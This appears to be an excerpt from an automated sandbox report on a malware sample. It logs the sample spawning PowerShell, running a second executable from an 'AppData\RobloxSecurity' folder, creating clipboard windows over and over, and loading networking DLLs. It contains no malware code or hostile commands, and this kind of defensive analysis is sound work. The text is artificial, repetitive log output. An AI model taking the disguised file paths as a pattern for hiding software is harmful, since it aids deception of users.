                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_02B8E00C0_2_02B8E00C
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_06258E500_2_06258E50
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_0625A2680_2_0625A268
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_062500060_2_06250006
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_062500400_2_06250040
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067EEDD10_2_067EEDD1
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_06EF04F00_2_06EF04F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F5B4901_2_04F5B490
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F5B4711_2_04F5B471
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08803A981_2_08803A98
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeCode function: 4_2_00007FFD9B9A2B4C4_2_00007FFD9B9A2B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B98830A11_2_00007FFD9B98830A
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B972B4C11_2_00007FFD9B972B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B98976211_2_00007FFD9B989762
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B987B8D11_2_00007FFD9B987B8D
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B977D1511_2_00007FFD9B977D15
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B978B0818_2_00007FFD9B978B08
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B9882EA18_2_00007FFD9B9882EA
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B972B4C18_2_00007FFD9B972B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B98974218_2_00007FFD9B989742
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B987B6D18_2_00007FFD9B987B6D
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B977D5918_2_00007FFD9B977D59
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 42_2_00007FFD9B982B4C42_2_00007FFD9B982B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 42_2_00007FFD9B9806D142_2_00007FFD9B9806D1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 42_2_00007FFD9B987D5942_2_00007FFD9B987D59
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 44_2_00007FFD9B962B4C44_2_00007FFD9B962B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 44_2_00007FFD9B967D5944_2_00007FFD9B967D59
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 45_2_00007FFD9B992B4C45_2_00007FFD9B992B4C
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 45_2_00007FFD9B9978F545_2_00007FFD9B9978F5
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1796380426.0000000000CF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs jqOHOuPMJP.exe
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1797186606.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs jqOHOuPMJP.exe
                  Source: jqOHOuPMJP.exe, 00000000.00000000.1644125840.0000000000946000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLaps.exe4 vs jqOHOuPMJP.exe
                  Source: jqOHOuPMJP.exe, 00000000.00000002.1817862177.0000000003DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHab9b84cf0be099b26b5d8bd8efac02917c.exeT vs jqOHOuPMJP.exe
                  Source: jqOHOuPMJP.exeBinary or memory string: OriginalFilenameLaps.exe4 vs jqOHOuPMJP.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: textinputframework.dllJump to behavior
